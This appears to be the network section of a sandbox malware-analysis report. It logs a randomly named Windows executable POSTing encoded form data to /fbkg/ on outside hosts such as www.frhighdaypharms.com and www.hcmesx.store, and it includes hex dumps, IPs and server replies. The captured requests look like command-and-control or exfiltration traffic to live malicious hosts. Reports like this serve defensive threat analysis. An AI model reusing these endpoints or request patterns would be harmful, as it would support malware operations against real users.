                                                                                                                                                                                                Data Raw: 54 36 49 3d 70 59 68 53 69 2b 6d 53 4a 31 49 7a 4d 72 6c 77 6b 69 66 75 31 4d 2b 38 44 66 36 4a 78 73 69 46 6a 6a 6f 6b 30 6a 6b 69 32 77 61 6f 4b 6b 66 6f 59 69 2f 34 34 2b 4b 74 45 4f 77 4e 79 6c 39 56 55 6d 73 73 47 70 4e 64 77 59 4b 55 66 34 61 5a 32 47 45 6f 36 6f 68 46 49 67 74 36 66 69 37 32 39 38 59 75 37 36 7a 50 6d 5a 64 38 43 53 70 42 52 55 64 55 34 6f 6c 39 38 47 75 59 33 6a 49 64 37 42 75 38 33 38 75 5a 50 41 79 6a 72 7a 44 33 43 66 33 4f 35 6c 59 6e 4c 46 39 56 51 31 44 6d 57 49 64 61 2b 2b 47 37 4e 78 72 4a 32 46 53 78 52 77 6b 47 63 33 36 55 45 48 6b 6c 32 4e 5a 70 59 63 33 66 38 76 43 42 78 42 63 31 33 64 63 4e 68 4a 79 4c 7a 61 58 51 6b 58 58 46 78 50 73 46 6e 43 37 53 6d 49 31 4d 68 57 53 4f 47 77 71 38 65 77 51 63 79 77 74 4a 50 6d 6d 6b 38 56 70 42 55 67 76 5a 58 58 45 39 4f 32 6b 59 61 76 45 46 6d 66 58 51 34 6e 36 65 50 61 51 70 4f 54 41 74 6b 77 58 6e 45 77 78 49 4f 6f 33 41 31 6e 55 6c 30 4d 30 34 65 6d 78 67 36 44 36 72 61 2f 68 32 31 49 4e 48 33 66 2b 72 6a 78 52 5a 67 2f 33 46 6e 53 41 77 35 4d 4c 4a 4b 71 79 59 75 50 51 43 66 76 79 73 72 53 39 55 2f 64 79 6c 71 2b 6a 5a 45 44 50 77 2f 67 2b 4a 54 53 35 72 76 4f 33 46 56 66 6e 53 54 65 72 4f 34 45 33 69 57 70 6f 64 61 33 73 38 39 4c 2b 2f 6d 32 7a 4a 62 67 7a 4f 46 4c 46 2b 56 76 54 61 75 6e 72 32 48 59 4b 64 58 51 75 73 2f 51 2f 42 74 4d 51 44 58 69 79 55 6d 52 58 74 4a 6f 31 54 66 61 54 62 63 58 78 52 41 43 59 61 39 56 41 6d 79 48 4d 6c 67 4a 63 46 2f 38 7a 6e 75 48 4a 56 64 30 4b 52 56 51 46 45 47 66 35 30 65 37 44 38 30 48 66 52 4d 46 4b 31 74 52 36 69 5a 2b 63 3d
                                                                                                                                                                                                Data Ascii: T6I=pYhSi+mSJ1IzMrlwkifu1M+8Df6JxsiFjjok0jki2waoKkfoYi/44+KtEOwNyl9VUmssGpNdwYKUf4aZ2GEo6ohFIgt6fi7298Yu76zPmZd8CSpBRUdU4ol98GuY3jId7Bu838uZPAyjrzD3Cf3O5lYnLF9VQ1DmWIda++G7NxrJ2FSxRwkGc36UEHkl2NZpYc3f8vCBxBc13dcNhJyLzaXQkXXFxPsFnC7SmI1MhWSOGwq8ewQcywtJPmmk8VpBUgvZXXE9O2kYavEFmfXQ4n6ePaQpOTAtkwXnEwxIOo3A1nUl0M04emxg6D6ra/h21INH3f+rjxRZg/3FnSAw5MLJKqyYuPQCfvysrS9U/dylq+jZEDPw/g+JTS5rvO3FVfnSTerO4E3iWpoda3s89L+/m2zJbgzOFLF+VvTaunr2HYKdXQus/Q/BtMQDXiyUmRXtJo1TfaTbcXxRACYa9VAmyHMlgJcF/8znuHJVd0KRVQFEGf50e7D80HfRMFK1tR6iZ+c=
                                                                                                                                                                                                Nov 17, 2023 19:32:07.643496037 CET1365INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:32:07 GMT
                                                                                                                                                                                                Server: Apache/2.4.57 (codeit) OpenSSL/3.0.10+quic mod_perl/2.0.11 Perl/v5.16.3
                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                69192.168.11.2050196209.182.252.24580C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:32:07.473860025 CET1365OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.frhighdaypharms.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.frhighdaypharms.com
                                                                                                                                                                                                Referer: http://www.frhighdaypharms.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 70 59 68 53 69 2b 6d 53 4a 31 49 7a 4d 72 6c 77 6b 69 66 75 31 4d 2b 38 44 66 36 4a 78 73 69 46 6a 6a 6f 6b 30 6a 6b 69 32 77 61 6f 4b 6b 66 6f 59 69 2f 34 34 2b 4b 74 45 4f 77 4e 79 6c 39 56 55 6d 73 73 47 70 4e 64 77 59 4b 55 66 34 61 5a 32 47 45 6f 36 6f 68 46 49 67 74 36 66 69 37 32 39 38 59 75 37 36 7a 50 6d 5a 64 38 43 53 70 42 52 55 64 55 34 6f 6c 39 38 47 75 59 33 6a 49 64 37 42 75 38 33 38 75 5a 50 41 79 6a 72 7a 44 33 43 66 33 4f 35 6c 59 6e 4c 46 39 56 51 31 44 6d 57 49 64 61 2b 2b 47 37 4e 78 72 4a 32 46 53 78 52 77 6b 47 63 33 36 55 45 48 6b 6c 32 4e 5a 70 59 63 33 66 38 76 43 42 78 42 63 31 33 64 63 4e 68 4a 79 4c 7a 61 58 51 6b 58 58 46 78 50 73 46 6e 43 37 53 6d 49 31 4d 68 57 53 4f 47 77 71 38 65 77 51 63 79 77 74 4a 50 6d 6d 6b 38 56 70 42 55 67 76 5a 58 58 45 39 4f 32 6b 59 61 76 45 46 6d 66 58 51 34 6e 36 65 50 61 51 70 4f 54 41 74 6b 77 58 6e 45 77 78 49 4f 6f 33 41 31 6e 55 6c 30 4d 30 34 65 6d 78 67 36 44 36 72 61 2f 68 32 31 49 4e 48 33 66 2b 72 6a 78 52 5a 67 2f 33 46 6e 53 41 77 35 4d 4c 4a 4b 71 79 59 75 50 51 43 66 76 79 73 72 53 39 55 2f 64 79 6c 71 2b 6a 5a 45 44 50 77 2f 67 2b 4a 54 53 35 72 76 4f 33 46 56 66 6e 53 54 65 72 4f 34 45 33 69 57 70 6f 64 61 33 73 38 39 4c 2b 2f 6d 32 7a 4a 62 67 7a 4f 46 4c 46 2b 56 76 54 61 75 6e 72 32 48 59 4b 64 58 51 75 73 2f 51 2f 42 74 4d 51 44 58 69 79 55 6d 52 58 74 4a 6f 31 54 66 61 54 62 63 58 78 52 41 43 59 61 39 56 41 6d 79 48 4d 6c 67 4a 63 46 2f 38 7a 6e 75 48 4a 56 64 30 4b 52 56 51 46 45 47 66 35 30 65 37 44 38 30 48 66 52 4d 46 4b 31 74 52 36 69 5a 2b 63 3d
                                                                                                                                                                                                Data Ascii: T6I=pYhSi+mSJ1IzMrlwkifu1M+8Df6JxsiFjjok0jki2waoKkfoYi/44+KtEOwNyl9VUmssGpNdwYKUf4aZ2GEo6ohFIgt6fi7298Yu76zPmZd8CSpBRUdU4ol98GuY3jId7Bu838uZPAyjrzD3Cf3O5lYnLF9VQ1DmWIda++G7NxrJ2FSxRwkGc36UEHkl2NZpYc3f8vCBxBc13dcNhJyLzaXQkXXFxPsFnC7SmI1MhWSOGwq8ewQcywtJPmmk8VpBUgvZXXE9O2kYavEFmfXQ4n6ePaQpOTAtkwXnEwxIOo3A1nUl0M04emxg6D6ra/h21INH3f+rjxRZg/3FnSAw5MLJKqyYuPQCfvysrS9U/dylq+jZEDPw/g+JTS5rvO3FVfnSTerO4E3iWpoda3s89L+/m2zJbgzOFLF+VvTaunr2HYKdXQus/Q/BtMQDXiyUmRXtJo1TfaTbcXxRACYa9VAmyHMlgJcF/8znuHJVd0KRVQFEGf50e7D80HfRMFK1tR6iZ+c=
                                                                                                                                                                                                Nov 17, 2023 19:32:07.643496037 CET1365INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:32:07 GMT
                                                                                                                                                                                                Server: Apache/2.4.57 (codeit) OpenSSL/3.0.10+quic mod_perl/2.0.11 Perl/v5.16.3
                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                738.59.48.8680192.168.11.2050134C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:26:36.153603077 CET364OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.hcmesx.store
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.hcmesx.store
                                                                                                                                                                                                Referer: http://www.hcmesx.store/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 45 73 6e 65 31 38 33 7a 70 35 41 69 31 41 57 30 5a 61 5a 39 74 6d 35 6a 74 71 58 5a 6c 4d 34 42 36 67 6f 77 48 4e 35 4c 4a 74 38 7a 39 77 53 6f 72 4f 73 4a 2f 68 42 36 64 65 4e 6c 6e 35 75 7a 56 55 79 57 64 46 65 72 34 51 4a 59 68 5a 79 77 70 35 32 58 6f 46 73 77 57 74 54 49 66 52 6f 53 4d 71 54 38 66 37 59 4c 75 59 34 6e 2b 69 45 31 78 58 63 38 76 62 4e 43 6d 67 77 51 42 69 4f 45 67 38 2b 70 73 70 63 35 62 4f 37 39 4d 4b 50 76 67 56 69 41 66 66 74 4c 32 73 57 79 56 54 45 2b 72 54 35 6f 66 2f 75 31 2f 7a 67 72 35 2f 35 43 52 67 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=Esne183zp5Ai1AW0ZaZ9tm5jtqXZlM4B6gowHN5LJt8z9wSorOsJ/hB6deNln5uzVUyWdFer4QJYhZywp52XoFswWtTIfRoSMqT8f7YLuY4n+iE1xXc8vbNCmgwQBiOEg8+pspc5bO79MKPvgViAfftL2sWyVTE+rT5of/u1/zgr5/5CRg==
                                                                                                                                                                                                Nov 17, 2023 19:26:36.323535919 CET365INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:26:37 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                Data Raw: 31 62 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 52 c1 6e 13 31 10 bd f7 2b 8c 11 12 48 bb eb 4d ab 4a 68 b3 bb a8 0a 29 07 22 b5 aa c2 a1 27 e4 d8 26 eb 76 6d af ec 49 d2 50 55 e2 c2 5f 70 ab 8a b8 f4 ce a5 3f 53 51 c4 67 60 af 43 8b 2a f0 c5 7e 33 e3 f7 9e c7 53 3e 79 7d 30 9a 1e 1f 8e 51 03 aa ad b7 ca 3f 9b a0 dc 23 c7 ac ec 00 b1 86 5a 27 a0 c2 ef a6 fb e9 4b 8c 24 af f0 64 ef fd e8 60 32 19 8f a6 18 39 cb 2a 4c 88 e3 a7 d9 ee 20 6b 29 39 71 a9 07 69 67 4d a6 a4 ce 4e 1c ae 4b 12 c9 ee 59 eb c9 5e 26 b5 84 e7 e7 92 17 f8 ed 78 be 86 23 da 6e 2f f6 cd 0e 6c bf c1 09 3b fd 47 f4 e2 c5 03 0f 2a 95 00 fa d8 5c bd 85 fc 8a a9 e0 73 29 c5 aa 33 16 30 d2 54 89 bf 31 33 1a 84 f6 af 5a 49 0e 4d c5 c5 52 32 91 f6 20 f1 ae a5 5a a8 d4 31 da 8a 6a 90 e5 89 a2 67 8f 22 0b 27 6c 5f 40 67 be 46 1b ec a5 a3 38 48 68 45 fd f3 fa f2 ee cb b7 5f 37 37 77 9f af 7e 7c bf be fd f4 b5 24 31 13 ab 1c ac 7d 55 7f 0e 2b 74 3e 99 19 be 4e e4 07 eb ad 9e f7 4e 0a 34 c8 f3 67 c3 46 c8 79 03 1b d0 51 ce a5 9e 17 28 1f 2a 6a e7 52 fb d3 c5 3d cf d3 95 a5 dd ff 2f 3f 14 6e 64 66 c6 72 61 0b a4 8d 16 c3 98 f5 3d 8e de 4a d2 c4 41 08 be fc cf 71 b9 ec 3f 3f 48 84 e7 86 4e 47 9a 38 03 0d 40 e7 0a 42 f8 d9 5a c1 c7 7c 27 63 8c b0 8e e5 bb e4 95 9f 21 ad 45 3b 32 5c 54 7d 28 8c 44 bc eb 89 89 67 0e db 46 87 f4 63 f8 1b 64 53 ca f5 9d 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 1b7uRn1+HMJh)"'&vmIPU_p?SQg`C*~3S>y}0Q?#Z'K$d`29*L k)9qigMNKY^&x#n/l;G*\s)30T13ZIMR2 Z1jg"'l_@gF8HhE_77w~|$1}U+t>NN4gFyQ(*jR=/?ndfra=JAq??HNG8@BZ|'c!E;2\T}(DgFcdS0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                7192.168.11.205013438.59.48.8680C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:26:36.153603077 CET364OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.hcmesx.store
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.hcmesx.store
                                                                                                                                                                                                Referer: http://www.hcmesx.store/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 45 73 6e 65 31 38 33 7a 70 35 41 69 31 41 57 30 5a 61 5a 39 74 6d 35 6a 74 71 58 5a 6c 4d 34 42 36 67 6f 77 48 4e 35 4c 4a 74 38 7a 39 77 53 6f 72 4f 73 4a 2f 68 42 36 64 65 4e 6c 6e 35 75 7a 56 55 79 57 64 46 65 72 34 51 4a 59 68 5a 79 77 70 35 32 58 6f 46 73 77 57 74 54 49 66 52 6f 53 4d 71 54 38 66 37 59 4c 75 59 34 6e 2b 69 45 31 78 58 63 38 76 62 4e 43 6d 67 77 51 42 69 4f 45 67 38 2b 70 73 70 63 35 62 4f 37 39 4d 4b 50 76 67 56 69 41 66 66 74 4c 32 73 57 79 56 54 45 2b 72 54 35 6f 66 2f 75 31 2f 7a 67 72 35 2f 35 43 52 67 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=Esne183zp5Ai1AW0ZaZ9tm5jtqXZlM4B6gowHN5LJt8z9wSorOsJ/hB6deNln5uzVUyWdFer4QJYhZywp52XoFswWtTIfRoSMqT8f7YLuY4n+iE1xXc8vbNCmgwQBiOEg8+pspc5bO79MKPvgViAfftL2sWyVTE+rT5of/u1/zgr5/5CRg==
                                                                                                                                                                                                Nov 17, 2023 19:26:36.323535919 CET365INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:26:37 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                Data Raw: 31 62 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 52 c1 6e 13 31 10 bd f7 2b 8c 11 12 48 bb eb 4d ab 4a 68 b3 bb a8 0a 29 07 22 b5 aa c2 a1 27 e4 d8 26 eb 76 6d af ec 49 d2 50 55 e2 c2 5f 70 ab 8a b8 f4 ce a5 3f 53 51 c4 67 60 af 43 8b 2a f0 c5 7e 33 e3 f7 9e c7 53 3e 79 7d 30 9a 1e 1f 8e 51 03 aa ad b7 ca 3f 9b a0 dc 23 c7 ac ec 00 b1 86 5a 27 a0 c2 ef a6 fb e9 4b 8c 24 af f0 64 ef fd e8 60 32 19 8f a6 18 39 cb 2a 4c 88 e3 a7 d9 ee 20 6b 29 39 71 a9 07 69 67 4d a6 a4 ce 4e 1c ae 4b 12 c9 ee 59 eb c9 5e 26 b5 84 e7 e7 92 17 f8 ed 78 be 86 23 da 6e 2f f6 cd 0e 6c bf c1 09 3b fd 47 f4 e2 c5 03 0f 2a 95 00 fa d8 5c bd 85 fc 8a a9 e0 73 29 c5 aa 33 16 30 d2 54 89 bf 31 33 1a 84 f6 af 5a 49 0e 4d c5 c5 52 32 91 f6 20 f1 ae a5 5a a8 d4 31 da 8a 6a 90 e5 89 a2 67 8f 22 0b 27 6c 5f 40 67 be 46 1b ec a5 a3 38 48 68 45 fd f3 fa f2 ee cb b7 5f 37 37 77 9f af 7e 7c bf be fd f4 b5 24 31 13 ab 1c ac 7d 55 7f 0e 2b 74 3e 99 19 be 4e e4 07 eb ad 9e f7 4e 0a 34 c8 f3 67 c3 46 c8 79 03 1b d0 51 ce a5 9e 17 28 1f 2a 6a e7 52 fb d3 c5 3d cf d3 95 a5 dd ff 2f 3f 14 6e 64 66 c6 72 61 0b a4 8d 16 c3 98 f5 3d 8e de 4a d2 c4 41 08 be fc cf 71 b9 ec 3f 3f 48 84 e7 86 4e 47 9a 38 03 0d 40 e7 0a 42 f8 d9 5a c1 c7 7c 27 63 8c b0 8e e5 bb e4 95 9f 21 ad 45 3b 32 5c 54 7d 28 8c 44 bc eb 89 89 67 0e db 46 87 f4 63 f8 1b 64 53 ca f5 9d 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 1b7uRn1+HMJh)"'&vmIPU_p?SQg`C*~3S>y}0Q?#Z'K$d`29*L k)9qigMNKY^&x#n/l;G*\s)30T13ZIMR2 Z1jg"'l_@gF8HhE_77w~|$1}U+t>NN4gFyQ(*jR=/?ndfra=JAq??HNG8@BZ|'c!E;2\T}(DgFcdS0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                70192.168.11.2050197209.182.252.24580C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:32:10.161752939 CET1378OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.frhighdaypharms.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.frhighdaypharms.com
                                                                                                                                                                                                Referer: http://www.frhighdaypharms.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 70 59 68 53 69 2b 6d 53 4a 31 49 7a 4d 72 6c 77 6b 69 66 75 31 4d 2b 38 44 66 36 4a 78 73 69 46 6a 6a 6f 6b 30 6a 6b 69 32 32 43 6f 4b 58 48 6f 5a 42 48 34 37 2b 4b 74 48 4f 77 4d 79 6c 39 55 55 69 41 6f 47 70 41 6d 77 61 79 55 59 70 4b 5a 31 7a 51 6f 32 49 68 49 45 41 74 43 49 79 36 33 39 38 45 36 37 36 58 66 6e 70 70 38 44 53 5a 42 44 33 46 58 6e 49 6c 37 38 47 75 55 7a 6a 4a 69 37 42 61 73 33 38 69 5a 50 45 4f 6a 72 41 37 33 44 49 72 4f 69 6c 59 6f 43 6c 39 61 5a 56 44 74 57 4a 39 67 2b 2b 47 42 4e 30 50 4a 32 46 79 78 51 7a 38 4a 63 58 36 55 59 58 6b 36 79 4e 6c 79 59 59 66 39 38 73 65 42 78 47 67 31 32 39 63 4e 6e 6f 79 45 7a 36 58 53 31 6e 58 57 67 66 68 49 6e 43 76 47 6d 4a 68 4d 68 6d 57 4f 48 48 47 38 64 56 6b 63 75 41 74 4c 51 32 6d 33 31 31 70 64 55 67 2f 2f 58 55 39 47 4f 77 6b 59 5a 4e 4d 46 77 61 6a 54 37 48 36 59 41 36 52 75 64 47 59 58 6b 77 48 77 45 77 78 59 4f 70 7a 41 31 7a 51 6c 6d 5a 49 33 54 57 78 36 75 7a 37 78 51 66 64 43 31 49 51 4b 33 66 48 30 6a 79 64 5a 78 76 33 46 69 78 59 2f 78 38 4c 4b 56 36 79 4b 7a 66 51 72 66 76 33 46 72 54 4a 75 2b 74 65 6c 73 50 54 5a 53 44 50 7a 35 41 2b 4e 61 79 35 70 6c 75 33 46 56 66 37 73 54 65 76 4f 74 6c 66 69 57 61 41 64 63 6d 73 38 2f 4c 2b 31 6d 32 7a 55 62 67 2b 34 46 4c 4e 41 56 75 69 78 75 6c 6e 32 48 4a 36 64 45 6c 4f 7a 70 51 2f 59 67 73 52 56 4b 79 2b 48 6d 52 62 31 4a 6f 45 6f 66 73 62 62 64 58 68 52 45 43 59 56 6f 46 42 50 31 48 4d 7a 72 70 59 42 2f 38 2f 33 75 48 4e 46 64 7a 57 52 58 31 30 66 62 4c 6c 33 45 34 72 65 34 43 7a 6f 4f 6d 79 4c 6f 54 4b 55 61 35 61 6e 50 32 2f 47 35 42 67 55 4a 32 73 61 34 71 55 7a 39 52 47 59 57 39 42 79 72 72 73 33 36 2b 6e 6e 46 41 46 76 64 64 54 6c 58 6a 56 46 30 57 4b 55 56 35 37 76 59 35 74 75 45 73 4f 65 77 59 37 46 67 68 32 46 53 38 57 54 52 63 47 2b 34 68 34 30 6c 58 48 42 41 38 4b 2f 47 77 72 75 57 72 31 6b 64 69 63 77 4e 43 39 33 38 7a 30 55 71 6f 76 4d 51 4b 30 79 50 36 4c 39 62 6d 66 72 65 79 6c 35 57 6b 69 6e 5a 48 6a 52 54 5a 6b 73 6c 75 51 48 43 6a 45 56 48 57 44 37 68 70 75 79 67 39 33 68 34 62 46 67 30 41 38 4b 78 7a 6d 55 33 4a 55 33 77 72 68 56 32 54 76 55 4a 4f 6f 37 66 65 55 64 30 54 2f 74 44 46 53 77 61 74 49 61 79 58 36 67 7a 52 70 72 41 71 45 5a 76 56 53 6d 45 52 71 34 54 66 6c 63 4c 57 7a 33 43 54 70 6b 73 62 47 53 56 59 43 66 2b 6a 61 6a 55 4d 41 5a 31 45 47 69 37 4c 47 4f 39 54 33 6e 33 4c 6b 70 64 48 6a 4a 41 36 30 31 2b 41 50 70 6d 39 42 44 67 5a 37 69 4c 44 6b 69 4e 53 47 36 30 39 4d 6f 73 6f 33 78 2f 6d 4e 58 31 41 6e 33 49 44 4a 4b 59 44 65 53 45 47 35 52 6e 4d 34 66 77 33 68 79 33 5a 43 6b 2b 31 4e 43 6d 65 39 52 6d 73 69 45 45 38 37 59 42 33 2f 47 38 31 32 41 7a 49 53 72 4e 4f 46 58 4b 41 50 6b 69 4e 44 34 51 34 44 4c 48 54 30 6b 6a 55 37 48 6c 63 63 42 31 36 32 30 32 39 64 4a 37 6d 36 48 54 64 78 72 49 4b 79 47 48 6a 7a 39 64 6c 6a 75 57 4f 6c 7a 34 2b 33 75 71 38 75 78 42 6e 46 50 31 4c 2b 76 76 4f 36 39 32 30 4c 69 79 61 34 37 55 57 70 37 42 4f 6c 63 49 4f 56 44 44 54 41 41 33 74 39 7a 76 38 